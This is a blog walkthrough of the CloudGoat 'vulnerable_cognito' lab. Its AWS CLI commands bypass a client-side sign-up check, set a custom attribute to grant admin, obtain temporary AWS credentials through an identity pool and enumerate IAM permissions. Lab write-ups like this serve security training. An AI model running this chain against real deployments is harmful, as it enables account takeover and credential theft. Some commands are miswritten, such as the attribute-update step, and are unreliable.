CloudGoat: Vulnerable_Cognito

0xLeeBai
3 min readMay 7, 2024

--

Note:

  • We will be performing our attack via Kali Linux
  • Ensure you have done the pre-requisites before you start the lab

1. Preparation

1.1 Launch the scenario:

┌──(root㉿kali)-[~]
└─# cd /opt/cloudgoat
┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py create vulnerable_cognito

1.2: read the start.txt file

┌──(root㉿kali)-[/opt/cloudgoat]
└─# cd vulnerable_lambda*

┌──(root㉿kali)-[/opt/cloudgoat/xxx]
└─# cat start.txt

apigateway_url = https://xxxyyy/index.html
... ... ...

2. Enumeration

2.1 open the URL in browser

  • we found a sign up option
  • tried to sign up with my personal gmail account, but received error
  • view the page source of this page, at line 43 and 44 we found useful information

2.2: use AWS CLI to “sign up” and “confirm” my email manually to bypass client-side validation check for the email

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-idp sign-up --client-id 6838885ultq3m8b3n0n93ov3ek --username helloworld@gmail.com --password P@ssw0rd --user-attributes '[{"Name":"given_name","Value":"lorem"},{"Name":"family_name","Value":"ipsum"}]' --region us-east-1
I got the OTP in my gmail
┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-idp confirm-sign-up --client-id 6838885ultq3m8b3n0n93ov3ek --username helloworld@gmail.com --confirmation-code 287215 --region us-east-1

2.3: login via browser with our signed up credentials

  • once logged in, we are redirected to reader.html page

2.4: get the value of access token

  • inspect element > storage > local storage > we need to copy the cookie for the xxx.accessToken > save into a file “accessToken.txt”
┌──(root㉿kali)-[/opt/cloudgoat]
└─# cat accessToken.txt

access token = eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx

2.5: get the user attributes and metadata for the user

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-idp get-user --access-token eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx --region us-east-1

2.6: update the user attribute, so that we can grant ourselves admin permission

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-idp get-user --access-token eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx --user-attributes '[{"Name":"custom:access","Value":"admin"}]' --region us-east-1

2.7: get the IdentityPoolId, new access token, and identity id

  • we logout, then login, then manually access “admin.html” page
  • view page source, we found useful value like IdentityPoolId
  • we pull the new access token again
# ***SYNTAX***
# aws cognito-identity get-id --region [region] --identity-pool-id '[IdentityPool_Id]' --logins "cognito-idp.{region}.amazonaws.com/{UserPoolId}={idToken}"

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-identity get-id --region us-east-1 --identity-pool-id 'us-east-1:a6e3df92-034e-4fd1-968f-beb577bd5a92' --logins "cognito-idp.us-east-1.amazonaws.com/us-east-1_BEEOWbReZ=eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx"

{
"IdentityId": "us-east-1:9b575e70-f9d7-cd3e-8840-7be3fecf4d37"
}

2.8: collect the credentials

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws cognito-identity get-credentials-for-identity --region us-east-1 --identity-pool-id 'us-east-1:a6e3df92-034e-4fd1-968f-beb577bd5a92' --logins "cognito-idp.us-east-1.amazonaws.com/us-east-1_BEEOWbReZ=eyJraWQiOiJmenQwQW9QaUlGaHxxxxxx"

{
... ... ...
"Credentials": {
"AccessKeyId": "xxxaaa",
"SecretKey": "xxxbbb",
"SessionToken": "xxxccc",
... ... ...
}
}

2.9: IAM enumeration automatically using the above credentials

┌──(root㉿kali)-[/opt/cloudgoat]
└─# cd /opt

┌──(root㉿kali)-[/opt]
└─# git clone https://github.com/andresriancho/enumerate-iam.git

┌──(root㉿kali)-[/opt/enumerate-iam]
└─# cd enumerate-iam

┌──(root㉿kali)-[/opt/enumerate-iam]
└─# ./enumerate-iam.py --region us-east-1 --access-key xxxaaa --secret-key xxxbbb --session-token xxxccc

3. Clean up

┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py destroy vulnerable_cognito --help

Destroy "vulnerable_xxx" ? [y/n]: y

--

--

0xLeeBai

床前明月光,疑是地上霜。 举头望明月,低头思故乡。